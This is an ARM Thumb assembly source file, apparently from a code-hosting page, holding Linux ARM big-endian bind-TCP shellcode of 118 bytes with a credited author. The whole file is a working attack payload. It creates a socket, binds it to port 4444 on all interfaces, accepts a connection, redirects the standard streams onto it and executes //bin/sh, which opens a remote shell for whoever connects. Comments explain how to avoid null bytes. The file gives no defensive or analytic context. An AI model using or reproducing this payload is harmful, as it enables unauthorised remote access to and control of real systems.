EarthQuake
101 lines
1.5 KiB
ArmAsm
101 lines
1.5 KiB
ArmAsm
/*
|
|
Linux Arm Big Endian bind_tcp ipv4 shellcode, 118 bytes
|
|
Balazs Bucsay
|
|
@xoreipeip | earthquake <at@> rycon <do.t> hu
|
|
http://rycon.hu
|
|
port = 4444
|
|
ip = 0.0.0.0
|
|
*/
|
|
|
|
.section .text
|
|
.global _start
|
|
|
|
_start:
|
|
.code 32
|
|
|
|
# Thumb-Mode on
|
|
add r6, pc, #1
|
|
bx r6
|
|
.code 16
|
|
|
|
# _socket(2,1,0)
|
|
sub r2, r2, r2
|
|
add r1, r2, #1
|
|
add r0, r2, #2
|
|
lsl r7, r1, #8
|
|
add r7, r7, #0x19
|
|
svc 1
|
|
mov r6, r0
|
|
|
|
/*
|
|
1 uint8_t sin_len
|
|
1 sa_family_t sin_family
|
|
2 in_port_t sin_port
|
|
4 struct in_addr sin_addr
|
|
8 char sin_zero [8]
|
|
00 02 5C11 00000000 00000000 00000000
|
|
5c11 => 4444
|
|
*/
|
|
# _bind()
|
|
mov r2, #2
|
|
lsl r2, r2, #8
|
|
add r2, r2, #0x11
|
|
lsl r2, r2, #8
|
|
add r2, r2, #0x5C
|
|
sub r3, r3, r3
|
|
sub r4, r4, r4
|
|
sub r5, r5, r5
|
|
mov r1, sp
|
|
stm r1!, {r2-r5}
|
|
sub r1, #0x10
|
|
mov r2, #16
|
|
add r7, r7, #1
|
|
svc 1
|
|
|
|
# _listen()
|
|
mov r0, r6
|
|
sub r1, r1, r1
|
|
add r7, r7, #2
|
|
svc 1
|
|
|
|
# _accept()
|
|
mov r0, r6
|
|
sub r2, r2, r2
|
|
add r7, r7, #1
|
|
svc 1
|
|
mov r6, r0
|
|
|
|
# _dup2()
|
|
sub r1, r1, r1
|
|
mov r7, #63
|
|
svc 1
|
|
|
|
mov r0, r6
|
|
add r1, r1, #1
|
|
svc 1
|
|
|
|
mov r0, r6
|
|
add r1, r1, #1
|
|
svc 1
|
|
|
|
# _execve()
|
|
sub r2, r2, r2
|
|
mov r0, pc
|
|
add r0, #18
|
|
// next intstruction terminates the string beneath the code "//bin/sh"
|
|
// in case you want to say goodbye to the null character
|
|
// str r2, [r0, #8]
|
|
str r2, [sp, #8]
|
|
str r0, [sp, #4]
|
|
add r1, sp, #4
|
|
mov r7, #11
|
|
svc 1
|
|
|
|
# _exit()
|
|
sub r4, r4, r4
|
|
mov r0, r4
|
|
mov r7, #1
|
|
svc 1
|
|
.ascii "//bin/sh\0"
|
|
//.ascii "//bin/sh"
|